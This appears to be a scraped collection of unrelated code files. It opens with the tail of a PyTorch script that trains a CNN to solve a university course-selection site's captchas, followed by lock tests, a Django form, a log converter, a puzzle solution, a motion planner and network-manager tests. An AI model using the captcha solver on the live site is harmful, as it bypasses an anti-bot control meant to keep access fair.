os.path.join(DATA_CROP_DIR, 
filename)\n\n if random.random() <= train_size:\n dst = os.path.join(DATA_TRAIN_DIR, filename)\n train_cnt += 1\n else:\n dst = os.path.join(DATA_TEST_DIR, filename)\n test_cnt += 1\n\n shutil.copyfile(src, dst)\n\n print(\"Train set size: %d\" % train_cnt)\n print(\"Test set size: %d\" % test_cnt)\n print(\"Actual train_size: %.3f\" % (train_cnt / (train_cnt + test_cnt)))\n\n\ndef train_model():\n global logfp\n\n logfp = open(os.path.join(LOG_DIR, \"console.%d.log\" % int(time.time() * 1000)), 'w')\n\n batch_size = 64\n epochs = 15\n\n train_dataset = CaptchaDataset(DATA_TRAIN_DIR, train_set=True)\n test_dataset = CaptchaDataset(DATA_TEST_DIR, train_set=False)\n\n train_loader = D.DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n test_loader = D.DataLoader(test_dataset, batch_size=batch_size, shuffle=True)\n\n model = CaptchaCNN()\n\n if torch.cuda.is_available():\n model.cuda()\n\n optimizer = torch.optim.SGD(model.parameters(), lr=0.01)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.1)\n\n for epoch in range(1, epochs+1):\n t1 = time.time()\n\n cnn_train(model, train_loader, optimizer, epoch)\n cnn_test(model, test_loader, epoch)\n\n t2 = time.time()\n\n line = 'Time cost: {} seconds\\n'.format(int(t2 - t1))\n print(line, file=sys.stdout, flush=True)\n print(line, file=logfp, flush=True)\n\n scheduler.step()\n\n model_file = os.path.join(MODEL_DIR, \"cnn.epoch_%02d.pt\" % epoch)\n torch.save(model.state_dict(), model_file)\n\n logfp.close()\n\n\ndef determine_labels():\n\n labels = set()\n\n for filename in os.listdir(DATA_CROP_DIR):\n mat = re_dataset_filename.match(filename)\n assert mat is not None, filename\n ch = mat.group(3)\n labels.add(ch)\n\n labels = ''.join(sorted(labels))\n print(len(labels), labels)\n\n assert labels == '2345678abcdefghklmnpqrstuvwxy'\n\n\ndef main():\n # determine_labels()\n # build_train_test_set(train_size=0.8)\n train_model()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zhongxinghong/PKUElectiveCaptcha2021Spring","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"3"} +{"seq_id":"29219149177","text":"import asyncio\nfrom datetime import timedelta\n\nimport pytest\n\nfrom maps.infra.sedem.machine.lib.lock import MongoLock, AlreadyLockedError\nfrom maps.infra.sedem.machine.tests.integration_tests.fixtures.machine_fixture import MachineFixture\nfrom maps.pylibs.fixtures.matchers import Match\n\n\nclass TestMongoLock:\n\n def test_lock_acquire(self, fixture_factory):\n machine_fixture: MachineFixture = fixture_factory(MachineFixture)\n machine_fixture.run_until_complete(self.async_test_lock_acquire(machine_fixture))\n\n def test_lock_reacquire(self, fixture_factory):\n machine_fixture: MachineFixture = fixture_factory(MachineFixture)\n machine_fixture.run_until_complete(self.async_test_lock_reacquire(machine_fixture))\n\n def test_lock_already_acquired(self, fixture_factory):\n machine_fixture: MachineFixture = fixture_factory(MachineFixture)\n machine_fixture.run_until_complete(self.async_test_lock_already_acquired(machine_fixture))\n\n async def async_test_lock_acquire(self, machine_fixture):\n mongo = machine_fixture.mongo()\n db = mongo.db_instance()\n\n async with MongoLock(db, lock_name='lock0'):\n [lock] = await mongo.async_get_collection_documents(name='lock')\n\n assert lock == Match.HasItems({'lock_name': 'lock0'})\n\n cleared_locks = await 
mongo.async_get_collection_documents(name='lock')\n assert cleared_locks == []\n\n async def async_test_lock_reacquire(self, machine_fixture):\n mongo = machine_fixture.mongo()\n db = mongo.db_instance()\n\n async with MongoLock(db, lock_name='lock0', ttl=timedelta(milliseconds=10)):\n [lock0] = await mongo.async_get_collection_documents(name='lock')\n await asyncio.sleep(0.1)\n async with MongoLock(db, lock_name='lock0'):\n [lock0_reacquired] = await mongo.async_get_collection_documents(name='lock')\n\n cleared_locks = await mongo.async_get_collection_documents(name='lock')\n assert cleared_locks == []\n\n assert lock0 == Match.HasItems({'lock_name': 'lock0'})\n assert lock0_reacquired == Match.HasItems({'lock_name': 'lock0'})\n assert lock0['expires_at'] < lock0_reacquired['locked_at']\n\n async def async_test_lock_already_acquired(self, machine_fixture):\n mongo = machine_fixture.mongo()\n db = mongo.db_instance()\n\n async with MongoLock(db, lock_name='lock0'):\n with pytest.raises(AlreadyLockedError):\n async with MongoLock(db, lock_name='lock0'):\n pass\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/integration_tests/mongo_lock_test.py","file_name":"mongo_lock_test.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36394460553","text":"from django import forms\nfrom .models import Contact\n\n\nclass ContactModelForm(forms.ModelForm):\n class Meta:\n model = Contact\n fields = ['email']\n widgets = {'email': forms.EmailInput(\n attrs={'style': \"outline: none; border: none; padding-top: 0px;padding-bottom: 0px;width: 100%;height: 100%;background-color: #DEECED;font-family: Lora, serif;padding-left: 23px;border:none\", 'class': '\"border-0\"', 'placeholder':\"E-mail\" }\n )}\n\n\nclass SendMailForm(forms.Form):\n _selected_action = forms.CharField(widget=forms.MultipleHiddenInput)\n message = forms.CharField(widget=forms.Textarea,required=False)","repo_name":"GlamorousCar/textiles","sub_path":"mail_sending/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32412222304","text":"# Standard Libraries\nfrom argparse import ArgumentParser\nfrom openpyxl import Workbook, worksheet\nfrom openpyxl.utils import get_column_letter\nfrom openpyxl.styles import PatternFill, Font\nimport os\nimport sys\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nEXIT_SUCCESS = 0\n\nPRINT_GROUP_FILLS = {\n \"GENERAL\" : PatternFill(start_color='FABF8F', fill_type='solid'),\n \"MEMORY\" : PatternFill(start_color='92CDDC', fill_type='solid'),\n \"INSTRUCTION\" : PatternFill(start_color='C4D79B', fill_type='solid'),\n \"ASSERT\" : PatternFill(start_color='C0504D', fill_type='solid')\n}\n\ndef stylize(sheet):\n \"\"\"Styles each cell\n\n :param worksheet sheet: Sheet to modify\n \n \"\"\"\n column_widths = []\n for row in sheet.iter_rows():\n # Determine the background color for this row\n try:\n background_color = PRINT_GROUP_FILLS[row[1].value]\n except KeyError:\n if row[1].value != \"Print Group\":\n logger.info(\"Background color not found for group %s. 
Consider adding one!\", row[1].value)\n background_color = PatternFill(start_color='FFFFFF', fill_type='solid')\n \n for i, cell in enumerate(row):\n cell.fill = background_color\n try:\n column_widths[i] = max(column_widths[i], len(str(cell.value)))\n except IndexError:\n column_widths.append(len(str(cell.value)))\n\n for i, column_width in enumerate(column_widths):\n # Add a little extra width with the 2\n sheet.column_dimensions[get_column_letter(i + 1)].width = column_width + 2\n\ndef convert_log_file(input_file_name, output_file_name):\n \"\"\"Converts a log file outputted by the program to an excel file\n\n :param str input_file_name: Name of the file to convert\n :param str output_file_name: Name of the file that will be outputted\n\n \"\"\"\n logger.info('Input file name: %s', input_file_name)\n logger.info('Output file name: %s', output_file_name)\n\n workbook = Workbook()\n sheet = workbook.active\n\n # Print the headers in the first row\n headers = ('Level', 'Print Group', 'File', 'Function', 'Line', 'Message')\n for i, header in enumerate(headers):\n sheet.cell(row=1, column=i+1).value = header\n sheet.cell(row=1, column=i+1).font = Font(bold=True)\n\n # Convert the lines in the debug file\n with open(input_file_name, 'r') as input_file:\n for line in input_file:\n entries = line.split(' : ', len(headers) - 1)\n if len(entries) < len(headers):\n logger.warning(\"Invalid formatting detected on line %s\", line)\n \n # Print the lines to the cells\n sheet.append(entries)\n logger.info(\"Dimensions of sheet: %s\", sheet.dimensions)\n\n # Apply style to cells\n stylize(sheet)\n\n # Add filters to the headers\n sheet.auto_filter.ref = sheet.dimensions\n\n workbook.save(filename=output_file_name)\n\ndef main():\n argument_parser = ArgumentParser(\n prog='python log_file_converter.py log_file',\n description='Converts a log file to a formatted excel file'\n )\n argument_parser.add_argument('log_files', nargs='+')\n argument_parser.add_argument('--in_place', action='store_true', help='Saves the file in the location of this script')\n argument_parser.add_argument('--verbose', '-v', action='store_true')\n args = argument_parser.parse_args()\n\n for log_file in args.log_files:\n if not os.path.isfile(log_file):\n raise ValueError(\"File %s does not exist\", log_file)\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n if os.path.splitext(log_file)[1] != '.log':\n logger.warning(\"A file with extension .log is expected. 
Resulting file may be incorrect\")\n\n if args.in_place:\n output_file_name = os.path.splitext(os.path.basename(log_file))[0] + '.xlsx'\n else:\n output_file_name = os.path.splitext(log_file)[0] + '.xlsx'\n logger.info(\"Absolute path of output file here: %s\", os.path.abspath(output_file_name))\n\n convert_log_file(log_file, output_file_name)\n\n logger.info(\"Log file conversion complete: SUCCESS\")\n\n return EXIT_SUCCESS\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"KaravolisL/ARM-ISA-Simulator","sub_path":"scripts/log_file_converter.py","file_name":"log_file_converter.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11959100422","text":"from itertools import cycle\nfrom functools import cache\nfrom collections import defaultdict\nimport heapq\nfrom txt_input.filepath import get_text\n\n@cache\ndef move_track(pos: int, roll: int) -> int:\n return (pos + roll - 1) % 10 + 1\n\ntrack_pos = [int(x.split()[-1]) for x in get_text('day21.txt').splitlines()]\ntrack_pos_copy = tuple(track_pos)\nscores = [0, 0]\nnum_rolls = 0\n# Each roll is increased by 3 each turn, so the total sum decreases by 1 (9 == -1 mod 10)\ndeterministic_die = cycle([6, 5, 4, 3, 2, 1, 0, 9, 8, 7])\n\nwhile scores[1 - num_rolls % 2] < 1000:\n track_pos[num_rolls % 2] = move_track(track_pos[num_rolls % 2], next(deterministic_die))\n scores[num_rolls % 2] += track_pos[num_rolls % 2]\n num_rolls += 1\n\nprint(min(scores) * num_rolls * 3)\n\ntot_score1 = tot_score2 = 0\ndirac_dice = {3: 1, 4: 3, 5: 6, 6: 7, 7: 6, 8: 3, 9: 1}\nscore_heap = [[0, 0, 0]]\npos_lookup = defaultdict(lambda: defaultdict(int))\npos_lookup[(0, 0)][track_pos_copy] = 1\n\ndef add_roll(pos: int):\n for roll, freq in dirac_dice.items():\n yield move_track(pos, roll), freq\n\nwhile score_heap:\n _, score1, score2 = heapq.heappop(score_heap)\n for (pos1, pos2), freq in pos_lookup[(score1, score2)].items():\n for new_pos1, freq1 in add_roll(pos1):\n new_score1 = score1 + new_pos1\n if new_score1 > 20:\n tot_score1 += freq * freq1\n continue\n for new_pos2, freq2 in add_roll(pos2):\n new_score2 = score2 + new_pos2\n if new_score2 > 20:\n tot_score2 += freq * freq1 * freq2\n continue\n if (new_score1 + new_score2, new_score1, new_score2) not in score_heap:\n heapq.heappush(score_heap, (new_score1 + new_score2, new_score1, new_score2))\n pos_lookup[(new_score1, new_score2)][(new_pos1, new_pos2)] += freq * freq1 * freq2\n\nprint(max(tot_score1, tot_score2))\n","repo_name":"alexjusung1/advent_2021","sub_path":"day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7153910387","text":"import time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .quadruped.quadruped_wrapper import QuadrupedWrapper\nfrom pysolver import *\nfrom pysolverlqr import *\n\nfrom pymomentum import *\nfrom momentumopt.kinoptpy.momentum_kinematics_optimizer import MomentumKinematicsOptimizer, EndeffectorTrajectoryGenerator, JointTrajectoryGenerator\nfrom momentumopt.kinoptpy.create_data_file import create_file, create_qp_files, create_lqr_files\n\ndef create_time_vector(dynamics_sequence):\n num_time_steps = len(dynamics_sequence.dynamics_states)\n # Create time vector\n time = np.zeros((num_time_steps))\n time[0] = dynamics_sequence.dynamics_states[0].dt\n for i in range(num_time_steps - 1):\n time[i + 1] = time[i] + 
dynamics_sequence.dynamics_states[i].dt\n\n return time\n\n\nclass MotionPlanner():\n\n def __init__(self, cfg_file, KinOpt=MomentumKinematicsOptimizer,\n RobotWrapper=QuadrupedWrapper, with_lqr=True):\n 'define problem configuration'\n self.planner_setting = PlannerSetting()\n self.planner_setting.initialize(cfg_file)\n\n self.dynlqr_setting = SolverLqrSetting()\n self.dynlqr_setting.initialize(cfg_file, \"solverlqr_dynamics\")\n\n 'define robot initial state'\n self.ini_state = DynamicsState()\n self.ini_state.fillInitialRobotState(cfg_file)\n\n 'define reference dynamic sequence'\n #self.kin_sequence = KinematicsSequence()\n #self.kin_sequence.resize(self.planner_setting.get(PlannerIntParam_NumTimesteps),\n # self.planner_setting.get(PlannerIntParam_NumDofs))\n\n 'define terrain description'\n self.terrain_description = TerrainDescription()\n self.terrain_description.loadFromFile(self.planner_setting.get(PlannerStringParam_ConfigFile))\n\n 'define contact plan'\n self.contact_plan = ContactPlanFromFile()\n self.contact_plan.initialize(self.planner_setting)\n self.contact_plan.optimize(self.ini_state, self.terrain_description)\n\n 'optimize motion'\n self.dyn_optimizer = DynamicsOptimizer()\n self.dyn_optimizer.initialize(self.planner_setting)\n\n 'Kinematics Optimizer'\n self.kin_optimizer = KinOpt()\n self.kin_optimizer.initialize(self.planner_setting, RobotWrapper=RobotWrapper)\n\n self.dynamics_feedback = None\n self.with_lqr = with_lqr\n\n self._init_from_settings()\n\n def _init_from_settings(self):\n kin_optimizer = self.kin_optimizer\n inv_kin = kin_optimizer.inv_kin\n etg = kin_optimizer.endeff_traj_generator\n etg.z_offset = self.planner_setting.get(PlannerDoubleParam_SwingTrajViaZ)\n\n inv_kin.w_lin_mom_tracking = self.planner_setting.get(PlannerDoubleParam_WeightLinMomentumTracking)\n inv_kin.w_ang_mom_tracking = self.planner_setting.get(PlannerDoubleParam_WeightAngMomentumTracking)\n inv_kin.w_endeff_contact = self.planner_setting.get(PlannerDoubleParam_WeightEndEffContact)\n inv_kin.w_endeff_tracking = self.planner_setting.get(PlannerDoubleParam_WeightEndEffTracking)\n inv_kin.p_endeff_tracking = self.planner_setting.get(PlannerDoubleParam_PGainEndEffTracking)\n inv_kin.p_com_tracking = self.planner_setting.get(PlannerDoubleParam_PGainComTracking)\n inv_kin.w_joint_regularization = self.planner_setting.get(PlannerDoubleParam_WeightJointReg)\n kin_optimizer.reg_orientation = self.planner_setting.get(PlannerDoubleParam_PGainOrientationTracking)\n\n def optimize_dynamics(self, kd_iter):\n print(\"DynOpt\", kd_iter)\n start = time.time()\n self.dyn_optimizer.optimize(self.ini_state, self.contact_plan,\n self.kin_optimizer.kinematics_sequence, kd_iter > 0)\n print(\"Dynopt - \" , time.time() -start)\n\n def optimize_kinematics(self, kd_iter, plotting=False):\n print(\"KinOpt\", kd_iter)\n start = time.time()\n self.kin_optimizer.optimize(self.ini_state, self.contact_plan.contactSequence(),\n self.dyn_optimizer.dynamicsSequence(), plotting=plotting)\n print(\"kinopt - \", time.time() - start)\n\n def optimize_dynamics_feedback(self):\n # 'define dynamics feedback controller'\n # '''\n # Access feedback gains using: dynamics_feedback.forceGain(time_id)\n # [currentCOM - desiredCoM ]\n # deltaForce = forceGain * [currentLMOM - desiredLMOM]\n # [currentAMOM - desiredAMOM]\n #\n # Torque = PD(q,qdot) + J^T * (plannedForce + deltaForce)\n # Remember that plannedForce of dyn_optimizer is normalized by robot weight\n # (self.planner_setting.get(PlannerDoubleParam_RobotWeight)),\n # so 
you need to multiply it by that amount for it to work!\n # deltaForce comes already in the right units.\n # '''\n self.dynamics_feedback = DynamicsFeedback()\n self.dynamics_feedback.initialize(self.dynlqr_setting, self.planner_setting)\n self.dynamics_feedback.optimize(self.ini_state, self.dyn_optimizer.dynamicsSequence())\n\n def _plot_show(self, plot_show):\n if plot_show:\n plt.show()\n else:\n plt.draw()\n plt.pause(0.001)\n\n def plot_centroidal(self):\n fig, axes = plt.subplots(3, 1, figsize=(6, 8), sharex=True)\n\n dynseq = self.dyn_optimizer.dynamicsSequence()\n kinseq = self.kin_optimizer.kinematics_sequence\n\n for i, (ax, prop) in enumerate(zip(axes, ['com', 'lmom', 'amom'])):\n data_dyn = np.array([getattr(ds, prop) for ds in dynseq.dynamics_states])\n data_kin = np.array([getattr(ds, prop) for ds in kinseq.kinematics_states])\n\n for dyn, kin, label in zip(data_dyn.T, data_kin.T, ['{}_{}'.format(prop, d) for d in ['x', 'y', 'z']]):\n line = ax.plot(dyn, label=label, alpha=0.75)[0]\n ax.plot(kin, '--', color=line.get_color())[0]\n\n ax.legend()\n ax.grid(True)\n\n fig.suptitle('Centroidal info for dyn (-) and kin (--)')\n fig.tight_layout(rect=[0, 0, 1., 0.95])\n plt.show()\n\n return fig, axes\n\n def plot_foot_traj(self, plot_show=True):\n fig, ax = plt.subplots(4,1)\n des_ee_traj = EndeffectorTrajectoryGenerator()\n des_ee_traj.z_offset = self.planner_setting.get(PlannerDoubleParam_SwingTrajViaZ)\n des_ee_pos = des_ee_traj(self.kin_optimizer)[0]\n foot_traj = self.kin_optimizer.motion_eff['trajectory']\n for i in range(4):\n ax[i].plot(foot_traj[:,3*i+2], label = \"act\")\n # ax[i].plot(foot_traj[:,3*i+1])\n # ax[i].plot(foot_traj[:,3*i])\n ax[i].plot(des_ee_pos[:,i,2], label = \"des\")\n # ax[i].plot(des_ee_pos[:,i,1])\n # ax[i].plot(des_ee_pos[:,i,0])\n ax[i].set_ylabel(\"m\")\n ax[i].set_xlabel(\"t [ms]\")\n ax[i].legend()\n ax[i].grid(True)\n fig.suptitle('Desired and actual foot trajectory')\n self._plot_show(plot_show)\n\n\n def replay_kinematics(self, start=0, end=None):\n self.kin_optimizer.robot.ensureDisplay()\n for ks in self.kin_optimizer.kinematics_sequence.kinematics_states[start:end]:\n q = ks.robot_posture.generalized_joint_positions\n self.kin_optimizer.robot.display(np.matrix(q).T)\n time.sleep(self.kin_optimizer.dt)\n\n def plot_base_trajecory(self, start=0, end=None):\n q_app = np.zeros([1,self.kin_optimizer.robot.model.nq])\n for ks in self.kin_optimizer.kinematics_sequence.kinematics_states[start:end]:\n q = ks.robot_posture.generalized_joint_positions\n q_app = np.append(q_app,q.reshape(1,len(q)),axis=0)\n fig, ax = plt.subplots(3,1)\n label = [\"base_x\",\"base_y\",\"base_z\"]\n for i in range(3):\n ax[i].plot(q_app[1:end,i], label = label[i])\n ax[i].set_ylabel(\"m\")\n ax[i].set_xlabel(\"t [ms]\")\n ax[i].legend()\n ax[i].grid(True)\n plt.show()\n\n def plot_joint_trajecory(self, start=0, end=None,\n plot_show=True, fig_suptitle=''):\n q_app = np.zeros([1,self.kin_optimizer.robot.model.nq])\n for ks in self.kin_optimizer.kinematics_sequence.kinematics_states[start:end]:\n q = ks.robot_posture.generalized_joint_positions\n q_app = np.append(q_app,q.reshape(1,len(q)),axis=0)\n fig, ax = plt.subplots(8,1)\n for i in range(8):\n ax[i].plot(q_app[1:end,i+7])\n ax[i].plot(self.kin_optimizer.joint_des[i,:])\n ax[i].set_ylabel(\"m\")\n ax[i].legend()\n ax[i].grid(True)\n self._plot_show(plot_show)\n\n\n def plot_com_motion(self, dynamics_states, kinematics_states,\n plot_show=True, fig_suptitle=''):\n fig, axes = plt.subplots(3, 3, figsize=(12, 8), 
sharex=True)\n axes = np.array(axes)\n\n def states_to_vec(states):\n com = np.vstack([s.com for s in states])\n lmom = np.vstack([s.lmom for s in states])\n amom = np.vstack([s.amom for s in states])\n return com, lmom, amom\n\n\n for i, (title, dyn, kin) in enumerate(zip(\n ['com', 'lmom', 'amom'],\n states_to_vec(dynamics_states),\n states_to_vec(kinematics_states))):\n\n axes[0, i].set_title(title)\n\n for j in range(3):\n axes[j, i].plot(dyn[:, j], label='dynamic')\n axes[j, i].plot(kin[:, j], label='kinematic')\n\n [ax.grid(True) for ax in axes.reshape(-1)]\n\n for i, label in enumerate(['x', 'y', 'z']):\n axes[i, 0].set_ylabel(label + ' [m]')\n axes[2, i].set_xlabel('time steps [5ms]')\n\n axes[0, 2].legend()\n\n if fig_suptitle:\n fig.suptitle(fig_suptitle)\n\n self._plot_show(plot_show)\n\n def save_files(self):\n time_vector = create_time_vector(self.dyn_optimizer.dynamicsSequence())\n create_file(time_vector,\n self.kin_optimizer.kinematics_sequence,\n self.dyn_optimizer.dynamicsSequence(),\n self.dynamics_feedback,\n self.planner_setting.get(PlannerDoubleParam_RobotWeight))\n\n if self.with_lqr:\n create_lqr_files(time_vector,\n self.kin_optimizer.motion_eff,\n self.kin_optimizer.kinematics_sequence,\n self.dyn_optimizer.dynamicsSequence(),\n self.dynamics_feedback,\n self.planner_setting.get(PlannerDoubleParam_RobotWeight))\n\n def save_qp_files(self):\n time_vector = create_time_vector(self.dyn_optimizer.dynamicsSequence())\n create_qp_files(time_vector,\n self.kin_optimizer.motion_eff,\n self.kin_optimizer.kinematics_sequence,\n self.dyn_optimizer.dynamicsSequence(),\n self.dynamics_feedback,\n self.planner_setting.get(PlannerDoubleParam_RobotWeight))\n\n def time_vector(self):\n return create_time_vector(self.dyn_optimizer.dynamicsSequence())\n\n def optimize_motion(self, plot_com_motion=True):\n dyn_optimizer = self.dyn_optimizer\n kin_optimizer = self.kin_optimizer\n\n self.optimize_dynamics(0)\n for kd_iter in range(0, self.planner_setting.get(PlannerIntParam_KinDynIterations)):\n self.optimize_kinematics(kd_iter + 1, plotting=False)\n self.optimize_dynamics(kd_iter + 1)\n optimized_kin_plan = self.kin_optimizer.kinematics_sequence\n optimized_dyn_plan = self.dyn_optimizer.dynamicsSequence()\n\n if plot_com_motion:\n self.plot_com_motion(optimized_dyn_plan.dynamics_states,\n optimized_kin_plan.kinematics_states, plot_show=False,\n fig_suptitle='kd_iter={}'.format(kd_iter))\n\n optimized_kin_plan = kin_optimizer.kinematics_sequence\n optimized_dyn_plan = dyn_optimizer.dynamicsSequence()\n\n time_vector = create_time_vector(dyn_optimizer.dynamicsSequence())\n\n if self.with_lqr:\n self.optimize_dynamics_feedback()\n return optimized_kin_plan, kin_optimizer.motion_eff, \\\n optimized_dyn_plan, self.dynamics_feedback, \\\n self.planner_setting, time_vector\n","repo_name":"wxmerkt/kino_dynamic_opt","sub_path":"momentumopt/python/momentumopt/motion_planner.py","file_name":"motion_planner.py","file_ext":"py","file_size_in_byte":12492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"23872072175","text":"\"\"\"Test network manager.\"\"\"\nimport asyncio\nfrom ipaddress import IPv4Address, IPv6Address\nfrom unittest.mock import AsyncMock, patch\n\nfrom dbus_fast import Variant\nimport pytest\n\nfrom supervisor.const import CoreState\nfrom supervisor.coresys import CoreSys\nfrom supervisor.dbus.const import InterfaceMethod\nfrom supervisor.exceptions import HostNotSupportedError\nfrom supervisor.homeassistant.const import WSEvent, 
WSType\nfrom supervisor.host.const import WifiMode\n\nfrom tests.dbus_service_mocks.base import DBusServiceMock\nfrom tests.dbus_service_mocks.network_active_connection import (\n ActiveConnection as ActiveConnectionService,\n)\nfrom tests.dbus_service_mocks.network_connection_settings import (\n SETTINGS_FIXTURE,\n ConnectionSettings as ConnectionSettingsService,\n)\nfrom tests.dbus_service_mocks.network_device_wireless import (\n DeviceWireless as DeviceWirelessService,\n)\nfrom tests.dbus_service_mocks.network_manager import (\n NetworkManager as NetworkManagerService,\n)\n\n\n@pytest.fixture(name=\"active_connection_service\")\nasync def fixture_active_connection_service(\n network_manager_services: dict[str, DBusServiceMock | dict[str, DBusServiceMock]]\n) -> ActiveConnectionService:\n \"\"\"Return mock active connection service.\"\"\"\n yield network_manager_services[\"network_active_connection\"]\n\n\n@pytest.fixture(name=\"wireless_service\")\nasync def fixture_wireless_service(\n network_manager_services: dict[str, DBusServiceMock | dict[str, DBusServiceMock]]\n) -> DeviceWirelessService:\n \"\"\"Return mock device wireless service.\"\"\"\n yield network_manager_services[\"network_device_wireless\"]\n\n\nasync def test_load(coresys: CoreSys, network_manager_service: NetworkManagerService):\n \"\"\"Test network manager load.\"\"\"\n network_manager_service.ActivateConnection.calls.clear()\n network_manager_service.CheckConnectivity.calls.clear()\n\n await coresys.host.network.load()\n\n assert coresys.host.network.connectivity is True\n\n assert len(coresys.host.network.dns_servers) == 1\n assert str(coresys.host.network.dns_servers[0]) == \"192.168.30.1\"\n\n assert len(coresys.host.network.interfaces) == 2\n name_dict = {intr.name: intr for intr in coresys.host.network.interfaces}\n assert \"eth0\" in name_dict\n assert name_dict[\"eth0\"].mac == \"AA:BB:CC:DD:EE:FF\"\n assert name_dict[\"eth0\"].enabled is True\n assert name_dict[\"eth0\"].ipv4.method == InterfaceMethod.AUTO\n assert name_dict[\"eth0\"].ipv4.gateway == IPv4Address(\"192.168.2.1\")\n assert name_dict[\"eth0\"].ipv4.ready is True\n assert name_dict[\"eth0\"].ipv6.method == InterfaceMethod.AUTO\n assert name_dict[\"eth0\"].ipv6.gateway == IPv6Address(\"fe80::da58:d7ff:fe00:9c69\")\n assert name_dict[\"eth0\"].ipv6.ready is True\n assert \"wlan0\" in name_dict\n assert name_dict[\"wlan0\"].enabled is False\n\n assert network_manager_service.ActivateConnection.calls == [\n (\n \"/org/freedesktop/NetworkManager/Settings/1\",\n \"/org/freedesktop/NetworkManager/Devices/1\",\n \"/\",\n )\n ]\n assert network_manager_service.CheckConnectivity.calls == []\n\n\nasync def test_load_with_disabled_methods(\n coresys: CoreSys,\n network_manager_service: NetworkManagerService,\n connection_settings_service: ConnectionSettingsService,\n):\n \"\"\"Test load does not disable methods of interfaces.\"\"\"\n network_manager_service.ActivateConnection.calls.clear()\n\n disabled = {\"method\": Variant(\"s\", \"disabled\")}\n connection_settings_service.settings = SETTINGS_FIXTURE | {\n \"ipv4\": disabled,\n \"ipv6\": disabled,\n }\n await coresys.dbus.network.get(\"eth0\").settings.reload()\n\n await coresys.host.network.load()\n assert network_manager_service.ActivateConnection.calls == []\n\n\nasync def test_load_with_network_connection_issues(\n coresys: CoreSys,\n network_manager_service: NetworkManagerService,\n active_connection_service: ActiveConnectionService,\n):\n \"\"\"Test load does not update interfaces with network 
connection issues.\"\"\"\n network_manager_service.ActivateConnection.calls.clear()\n\n active_connection_service.emit_properties_changed(\n {\"StateFlags\": 0x10, \"Ip4Config\": \"/\"}\n )\n await active_connection_service.ping()\n\n await coresys.host.network.load()\n\n assert network_manager_service.ActivateConnection.calls == []\n assert len(coresys.host.network.interfaces) == 2\n name_dict = {intr.name: intr for intr in coresys.host.network.interfaces}\n assert \"eth0\" in name_dict\n assert name_dict[\"eth0\"].enabled is True\n assert name_dict[\"eth0\"].ipv4.method == InterfaceMethod.AUTO\n assert name_dict[\"eth0\"].ipv4.gateway is None\n assert name_dict[\"eth0\"].ipv6.method == InterfaceMethod.AUTO\n assert name_dict[\"eth0\"].ipv6.gateway == IPv6Address(\"fe80::da58:d7ff:fe00:9c69\")\n\n\nasync def test_scan_wifi(coresys: CoreSys):\n \"\"\"Test scanning wifi.\"\"\"\n with pytest.raises(HostNotSupportedError):\n await coresys.host.network.scan_wifi(coresys.host.network.get(\"eth0\"))\n\n with patch(\"supervisor.host.network.asyncio.sleep\"):\n aps = await coresys.host.network.scan_wifi(coresys.host.network.get(\"wlan0\"))\n\n assert len(aps) == 2\n assert aps[0].mac == \"E4:57:40:A9:D7:DE\"\n assert aps[0].mode == WifiMode.INFRASTRUCTURE\n assert aps[1].mac == \"18:4B:0D:23:A1:9C\"\n assert aps[1].mode == WifiMode.INFRASTRUCTURE\n\n\nasync def test_scan_wifi_with_failures(\n coresys: CoreSys, wireless_service: DeviceWirelessService, caplog\n):\n \"\"\"Test scanning wifi with accesspoint processing failures.\"\"\"\n wireless_service.all_access_points = [\n \"/org/freedesktop/NetworkManager/AccessPoint/43099\",\n \"/org/freedesktop/NetworkManager/AccessPoint/43100\",\n \"/org/freedesktop/NetworkManager/AccessPoint/99999\",\n ]\n\n with patch(\"supervisor.host.network.asyncio.sleep\"):\n aps = await coresys.host.network.scan_wifi(coresys.host.network.get(\"wlan0\"))\n\n assert len(aps) == 2\n assert \"Can't process an AP\" in caplog.text\n\n\nasync def test_host_connectivity_changed(\n coresys: CoreSys,\n network_manager_service: NetworkManagerService,\n ha_ws_client: AsyncMock,\n):\n \"\"\"Test host connectivity changed.\"\"\"\n await coresys.host.load()\n assert coresys.host.network.connectivity is True\n\n network_manager_service.emit_properties_changed({\"Connectivity\": 1})\n await network_manager_service.ping()\n assert coresys.host.network.connectivity is False\n await asyncio.sleep(0)\n assert {\n \"type\": WSType.SUPERVISOR_EVENT,\n \"data\": {\n \"event\": WSEvent.SUPERVISOR_UPDATE,\n \"update_key\": \"network\",\n \"data\": {\"host_internet\": False},\n },\n } in [call.args[0] for call in ha_ws_client.async_send_command.call_args_list]\n\n ha_ws_client.async_send_command.reset_mock()\n network_manager_service.emit_properties_changed({}, [\"Connectivity\"])\n await network_manager_service.ping()\n await network_manager_service.ping()\n assert coresys.host.network.connectivity is True\n await asyncio.sleep(0)\n assert {\n \"type\": WSType.SUPERVISOR_EVENT,\n \"data\": {\n \"event\": WSEvent.SUPERVISOR_UPDATE,\n \"update_key\": \"network\",\n \"data\": {\"host_internet\": True},\n },\n } in [call.args[0] for call in ha_ws_client.async_send_command.call_args_list]\n\n\nasync def test_host_connectivity_disabled(\n coresys: CoreSys,\n network_manager_service: NetworkManagerService,\n ha_ws_client: AsyncMock,\n):\n \"\"\"Test host connectivity check disabled.\"\"\"\n await coresys.host.network.load()\n\n coresys.core.state = 